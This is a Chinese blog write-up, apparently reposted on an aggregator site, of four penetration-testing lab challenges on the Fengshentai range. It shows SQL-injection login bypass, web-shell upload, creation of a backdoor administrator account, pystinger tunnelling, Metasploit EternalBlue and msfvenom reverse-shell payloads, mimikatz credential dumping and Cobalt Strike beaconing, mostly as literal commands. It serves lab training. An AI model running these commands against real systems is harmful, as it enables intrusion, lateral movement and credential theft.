IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> 封神台-掌控者新靶场 - Kali系列4题 -> 正文阅读

[网络协议]封神台-掌控者新靶场 - Kali系列4题

封神台新靶场 - Kali系列【4题】

Kali渗透 - Sqlmap实操靶场

通过题目猜测可能是要用sqlmap,但是在网站直接找不到可以注入的点,于是猜测可能要进行目录扫描,于是拿出dirsearch

直接一波扫描发现后台登录地址
http://lri45456.ia.aqlab.cn/admin
在这里插入图片描述
最开始直接上sqlmap,结果靶场一直崩。那就只有手工注入了。
上burp。
从报错可以猜测后台查询语句 大概是:
select * from user where username = ‘’ and password = ‘’;
然后看是否返回结果,即不是空数组。
在这里插入图片描述

经典的万能密码
dp' or 1 =1 #
dq'+or+1+%3d+1%23

在这里插入图片描述
然后到后台页面。
在这里插入图片描述
发现可以上传木马【居然没有检查类型???】
在这里插入图片描述
上蚁剑

看用户,看网络链接
在这里插入图片描述
这么高权限😀,还有3389,所以尝试”本地登录3389“看网络配置,测试是否出网
在这里插入图片描述
不能ping通,多半不能出网,那就用http80端口复用

首先添加用户,并加入管理员组,后面登录就用这个账号

net user jdq 123456...aA /add && net localgroup administrators jdq /add

在这里插入图片描述

上工具pystinger,最开始用的是工具neo-regeorg,成功。
后面用pystinger,以前使用没成功,这次就行了,说明工具多多益善。
pystinger教程
上传他的proxy.php测试ok

上传stinger_server.exe 用蚁剑运行,查看是否运行成功。tasklist | findstr sting.成功运行

在这里插入图片描述

在本地windows开始连接该代理。
在这里插入图片描述
说明成功连接!!!!😀 注意,如果一直返回错误数据
在这里插入图片描述
请检查代理端口6000是否被占用。。。或者稍后半小时再试

本地端口6000就是socks4a代理端口,拿出proxifier,添加代理服务器。
在这里插入图片描述
因为靶机开启了3389端口,但是不能出网。所以无法直接连接,但是使用代理后我就可以用127.0.0.1来远程登录。
用proxifier代理mstsc.exe
在这里插入图片描述

在这里插入图片描述
然后登录,win+r,输入mstsc
在这里插入图片描述

可能这个地址看起来有点怪异,其实是因为proxifier已经把流量发到靶机了,所以靶机的3389才会收到这个流量。
在这里插入图片描述
然后输入账号密码,成功😀
在这里插入图片描述
本题说是要找管理员密码。
打开phpstudy,
在这里插入图片描述
点击mysql-front,猜测默认密码root,直接可视化查看数据库。
在这里插入图片描述
找不到flag在哪😭,知道的大佬给我说说。。。。。

Kali渗透 - 拿下目标服务器

用蚁剑直接在c盘网站根目录找,
在这里插入图片描述

Kali渗透 - 通过Sqlmap直接获得服务器权限

应该就是–os-shell直接获得shell,本题没有flag

kali渗透 - hydra爆破服务器登陆密码

本题有问题呢??题目说linux服务器,但靶机实际是windows服务器???

该靶机后续渗透 pystinger + cobalt strike 不出网上线

上传port扫描神器,扫描发现局域网好多机器。好多139/445
在这里插入图片描述
于是拿VPS有msf的进行永恒之蓝利用一下。

VPS 开启代理
./stinger_client -w http://lri45456.ia.aqlab.cn/Static/upload/source/20220312/proxy.php -l 0.0.0.0 -p 6000

第一个是永恒之蓝扫描模块:auxiliary/scanner/smb/smb_ms17_010
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.0.4
set proxies socks4:127.0.0.1:6000
run
在这里插入图片描述

第二个是永恒之蓝攻击代码:exploit/windows/smb/ms17_010_eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set payload payload/windows/shell_reverse_tcp
set rhosts 192.168.0.28
set lhost 127.0.0.1
set lport 60020(因为pystinger)
set proxies socks4:127.0.0.1:6000
set ReverseAllowProxy true
run
没有成功,我觉得是因为流量转发的问题,没办法,转了太多次了。。。。
第二种思路:
生成可执行木马木马
msfvenom lhost=192.168.0.27 lport=4444 -f exe --platform windows -p windows/shell_reverse_tcp > evil.exe
k8 加强版 zzz 攻击工具使用
下载

mstsc登录,上传相关的工具,测试192.168.0.20 可以运行起来,但是没有回连。

msf 做个小结:

  • 第一种
    可直接上传木马到靶机
    msfvenom 生成木马:msfvenom lhost=192.168.0.2 lport=4444 -f exe --platform windows -p windows/shell_reverse_tcp > evil.exe
    配合 exploit/multi/handler模块使用
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set lhost 192.168.0.2
set lport 4444
run
  • 第二种
    靶机并没有被控制,但发现漏洞,使用攻击模块
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.0.19
set payload windows/x64/shell/reverse_tcp
set lhost 192.168.0.2
set lport 4444
run

好了 看来msf神器不能使用了。换CS。

mimikatz,由于创建的jdq权限不够system,而蚁剑的权限是system,所以就用蚁剑运行mimikatz
在这里插入图片描述

mimikatz.exe “privilege::debug” “sekurlsa::logonpasswords” “exit”> password.txt
type password.txt
同时,由于该靶机是64位,所以要上传64位咪咪卡兹。
在这里插入图片描述

上neo-regeorg,mstsc挂钩代理neo,登录。
上pystinger,靶机与VPS连接成功。cs与pystinger在同一VPS。
cs+pystinger二者联动参考文章
上面文章的有一处不清楚,他是建立http listener
在这里插入图片描述

将生成的exe上传到靶机运行。成功上线
在这里插入图片描述

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-03-13 22:11:44  更:2022-03-13 22:12:10 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/26 6:37:32-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码